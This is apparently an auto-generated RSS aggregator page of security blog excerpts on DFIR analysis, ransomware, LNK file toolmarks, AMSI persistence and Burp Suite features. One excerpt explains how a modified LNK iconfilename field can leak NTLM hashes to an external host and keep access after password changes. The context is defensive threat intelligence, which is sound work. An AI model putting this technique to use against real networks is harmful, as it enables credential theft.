    Okay, I think that we can all admit that ransomware has consumed the news cycle of late, thanks to high visibility attacks such as Colonial Pipeline and JBS. Interestingly enough, there wasn't this sort of reaction the second time the City of Baltimore got attacked, which (IMHO) belies the news cycle more than anything else. However, while the focus is on ransomware, for the moment, it's a good time to point out that there's more to this than just the attacks that get blasted across news feeds. That is, ransomware itself is an economy, an eco-system, which is a moniker that goes a long way toward describing why victims of these attacks are impacted to the extent that they are. What I mean by this is that everything...EVERYTHING...about what goes into a ransomware attack is directed at t…  ( 6 min )
    Thoughts on Assessing Threat Actor Intent & Sophistication
    I was reading this Splunk blog post recently, and I have to say up front, I was disappointed by the fact that the promise of the title (i.e., "Detecting Cl0p Ransomware") was not delivered on by the remaining content of the post. Very early on in the blog post is the statement: Ransomware is by nature a post-exploitation tool, so before deploying it they must infiltrate the victim's infrastructure.  Okay, so at this point, I'm looking for something juicy, some information regarding the TTPs used to "infiltrate the victim's infrastructure" and to locate files of interest for staging and exfil, but instead, the author(s) dove right into analyzing the malware itself, through reverse engineering. Early in that malware RE exercise is the statement: This ransomware has a defense evasion feature …  ( 5 min )

  • Open

    Making the Case for Supply Chain Behavior Transparency
    The Biden Administration’s Cyber Executive Order includes a Software Bill of Materials (SBOM), an electronically readable format designed to provide an inventory of third-party components that make up software components. It is a critical and necessary first measure for protecting the software supply chain, but is it enough? One of the biggest challenges to supply chain transparency […] The post Making the Case for Supply Chain Behavior Transparency appeared first on Security Weekly.  ( 2 min )

  • Open

    Toolmarks: LNK Files in the news again
    As most regular readers of this blog can tell you, I'm a bit of a fan of LNK files...a LNK-o-phile, if you will. I'm not only fascinated by the richness of the structure, but as I began writing a parser for LNK files, I began to see some interesting aspects of intelligence that can be gleaned from LNK files, in particular, those created within a threat actor's development environment, and deployed to targets/infrastructures. First, there are different ways to create LNK files using the Windows API, and what's really cool is that each method has its own unique #toolmarks associated with it! Second, most often there is a pretty good amount of metadata embedded in the LNK file structure. There are file system time stamps, and often we'll see a NetBIOS system name, a volume S/N, a SID, or o…  ( 5 min )
    Testing, and taking DFIR a step further
    One of Shakespeare's lines from Hamlet I remember from high school is, "...there are more things on heaven and earth, Horatio, than are dreamt of in your philosophy." And that's one of the great things about the #DFIR industry...there's always something new. I do not for a moment think that I've seen everything, and I, for one, find it fascinating when we find something that is either new, or that has been talked about but is being seen "in the wild" for the first time. Someone mentioned recently that Microsoft's Antimalware Scan Interface (i.e., AMSI) could be used for persistence, and that got me very interested. This isn't something specifically or explicitly covered by the MITRE ATT&CK framework, and I wanted to dig into this a bit more to understand it. As it can be used for persisten…  ( 5 min )

  • Open

    20 Burp Suite tips from the Burp user community
    The Burp Suite user community can easily be described as passionate, dedicated, and highly invested in the development of our product. That's why we love it when our users take it upon themselves to q  ( 5 min )

  • Open

    Some of the best Burp extensions - as chosen by you
    As we mentioned in our recent blog post on good resources for new Burp Suite Professional users, the BApp Store is one of the largest repositories of community-created user content you're likely to fi  ( 3 min )

  • Open

    Dumping RDP Credentials
    Administrators typically use Remote Desktop Protocol (RDP) in order to manage Windows environments remotely. It is also typical for RDP to be enabled in systems that… Continue reading → Dumping RDP Credentials  ( 5 min )

  • Open

    A few tips for the newcomers on this sub !
    This post is mainly intended to help the people who discover this sub to start with. It could also be useful for the other folks, who knows ? What is an open directory ? Open directories (aka ODs or opendirs) are just unprotected websites that you can browse recursively, without any required authentication. You can freely download individual files from them. They're organised in a folder structure, as a local directory tree on your computer. This is really convenient as you can also download several files in a bunch recursively (See below). These sites are sometimes deliberately let open and, sometimes, inadvertently (seedboxes, personal websites with some dirs bad protected, ...). For these last ones, often, after someone has posted them here, they're hammered by many concurrent downlo…  ( 8 min )

  • Open

    Great getting started resources for new users of Burp Suite Professional
    If you're new to Burp Suite Professional, then congratulations. Not only have you just bought into the world's leading toolkit for web security testing - you've also joined a massive worldwide communi  ( 5 min )

  • Open

    Persistence – AMSI
    AMSI (Antimalware Scan Interface) is a vendor agnostic interface which can communicate with the endpoint in order to prevent execution of malware. The scan performed… Continue reading → Persistence – AMSI  ( 5 min )

  • Open

    Experience Burp Suite Enterprise Edition in a new live demo
    Quick link: Burp Suite Enterprise Edition live demo. Deploying enterprise-grade software isn't always easy. We wanted a quick way for people to see the core features of Burp Suite Enterprise Edition w  ( 2 min )

  • Open

    Recorded logins in Burp Scanner
    If you’re using Burp Suite to test your website, it’s probably got some way for users to log in - and chances are it’s more complicated than filling in a username and password and hitting submit. Burp  ( 6 min )

  • Open

    On #DFIR Analysis, pt III - Benefits of a Structured Model
    In my previous post, I presented some of the basic design elements for a structured approach to describing artifact constellations, and leveraging them to further DFIR analysis. As much of this is new, I'm sure that this all sounds like a lot of work, and if you've read the other posts on this topic, you're probably wondering about the benefits to all this work. In this post, I'll take a shot at netting out some of the more obvious benefits. Maintaining Corporate Knowledge Regardless of whether you're talking about an internal corporate position or a consulting role, analysts are going to see and learn new things based on their analysis. You're going to see new applications or techniques used, and perhaps even see the same threat actor making small changes to their TTPs due to some "stimulus…  ( 7 min )

  • Open

    On #DFIR Analysis, pt II - Describing Artifact Constellations
    I've been putting some serious thought into the topic of a new #DFIR model, and in an effort to extend and expand upon my previous post a bit, I wanted to take the opportunity to document and share some of my latest thoughts. I've discussed toolmarks and artifact constellations previously in this blog, and how they apply to attribution. In discussing a new #DFIR model, the question that arises is, how do we describe an artifact or toolmark constellation in a structured manner, so that it can be communicated and shared?   Of course, the next step after that, once we have a structured format for describing these constellations, is automating the sharing and "machine ingestion" of these constellation descriptions. But before we get ahead of ourselves, let's discuss a possible structure a bit …  ( 9 min )

  • Open

    AppSec experts share Burp Suite automation secrets and best practices
    Webinar recording: How to Perform Effective Web Application Security Assessments On 6 April, PortSwigger teamed up with HackerOne to bring you AppSec insights from industry expert Burp Suite users. Le  ( 3 min )

  • Open

    LNK Files, Again
    I ran across SharpWebServer via Twitter recently...the first line of the readme.md file states, "A Red Team oriented simple HTTP & WebDAV server written in C# with functionality to capture Net-NTLM hashes." I thought this was fascinating because it ties directly to a technique MITRE refers to as "Forced Authentication".  What this means is that a threat actor can (and has...we'll get to that shortly) modify Windows shortcut/LNK files such that the iconfilename field points to an external resource. What happens is that when an LNK file is launched, Explorer will reach out to the external resource and attempt to authenticate, sending NTLM hashes across the wire.  As such, SharpWebServer is built to capture those hashes. What this means is that a threat actor can gain access to an infrastructure, and as has been observed, use various means to maintain persistence...drop backdoors or RATs, create accounts on Internet-facing systems, etc.  However, many (albeit not all) of these means of persistence can be overcome via the judicious use of AV, EDR monitoring, and a universal password change. Modifying the iconfilename field of an LNK file is a means of persisting beyond password changes, because even after passwords are changed, the updated hashes will be sent across the wire. Now, I did say earlier that this has been used before, and it has.  CISA Alert TA18-074A includes a section named "Persistence through LNK file manipulation".  Note that from the alert, when looking at the "Contents of enu.cmd", "Persistence through LNK file manipulation", and "Registry Modification" sections, we can see a pretty comprehensive set of toolmarks associated with this threat actor.  This is excellent intrusion intelligence, and should be incorporated into any and all #DFIR parsing, enrichment and decoration, as well as threat hunting. However, things are even better! This tweet from bohops illustrates how to apply this technique to MSWord docs.  ( 4 min )
    On #DFIR Analysis
    I wanted to take the opportunity to discuss DFIR analysis; when discussing #DFIR analysis, we have to ask the question, "what _is_ "analysis"?" In most cases, what we call analysis is really just parsing some data source (or sources) and either viewing the output of the tools, or running keyword searches.  When this is the entire process, it is not analysis...it's running keyword searches. Don't get me wrong, there is nothing wrong with keyword searches, as they're a great way to orient yourself to the data and provide pivot points into further analysis.  However, these searches should not be considered the end of your analysis; rather, they are simply the beginning, or at least early stages of the analysis. The issue is that parsing data sources in isolation from each other and just runnin…  ( 10 min )

  • Open

    Simplified cloud deployment for Burp Suite Enterprise Edition
    Last year, we made Burp Suite Enterprise Edition cloud-friendly. Organizations migrating to the cloud, or taking a cloud-first approach, are able to deploy Burp Suite Enterprise Edition to AWS or Azur  ( 3 min )

  • Open

    PortSwigger teams up with HackerOne for AppSec workshop - 6 April
    Tuesday 6 April, 2021 | 10 AM PT / 1 PM ET / 6 PM GMT Update: this webinar can now be viewed on HackerOne's site, here. AppSec is a tricky business. While expertise remains scarce, threats are only ge  ( 3 min )

  • Open

    Extracting Toolmarks from Open Source Reporting, pt II
    On the heels of my previous post on this subject, I ran across this little gem from Microsoft regarding the print spooler EOP exploitation. I like articles like this because they illustrate threat actor activities outside the "norm", or what we usually tend to see in open reporting, if such things are illustrated in detail. Fig 4 (in step 1) in the article illustrates a new printer port being added to a Windows system as a step toward privilege escalation. This serves as one of the more-than-a-few interesting EDR-style tidbits from the article (i.e., detect the Powershell commandline), and also results in a fantastic toolmark that can be applied to DFIR "threat hunting".  The article illustrates, via fig 4, Powershell being used to add a printer port to the system, and that command results…  ( 5 min )
  • Open

    Improved CI/CD integrations in Burp Suite Enterprise Edition
    Burp Suite Enterprise Edition was designed to support your DevSecOps needs. One of the ways it does this is via our pre-built and generic CI/CD driver. This allows users to integrate with tooling of t  ( 4 min )

  • Open

    Browser powered scanning in Burp Suite
    Since the release of Browser powered scanning back in Burp Suite Professional 2020.8.1 we have had a lot of customers asking us about our motivation for choosing to integrate with Chromium and fo  ( 7 min )

  • Open

    API Scanning with Burp Suite
    Both Burp Suite Professional and Burp Suite Enterprise Edition contain Burp Scanner - allowing users to easily scan web applications for vulnerabilities. Other blog posts cover how Burp Scanner’s craw  ( 8 min )

  • Open

    Web application cartography: mapping out Burp Suite’s crawler
    At the core of Burp Suite is Burp Scanner - a powerful tool designed to reduce the number of manual steps users have to take to discover vulnerabilities in their targets. Burp Scanner was first releas  ( 16 min )

  • Open

    7 Burp Suite Professional-exclusive features to help you test smarter
    Welcome to the Pro user community So, you've downloaded Burp Suite Professional. What now? It's a big piece of software, and there's a lot of functionality you're probably not aware of - even if you'v  ( 7 min )
2022-02-21T01:06:41.429Z osmosfeed 1.14.4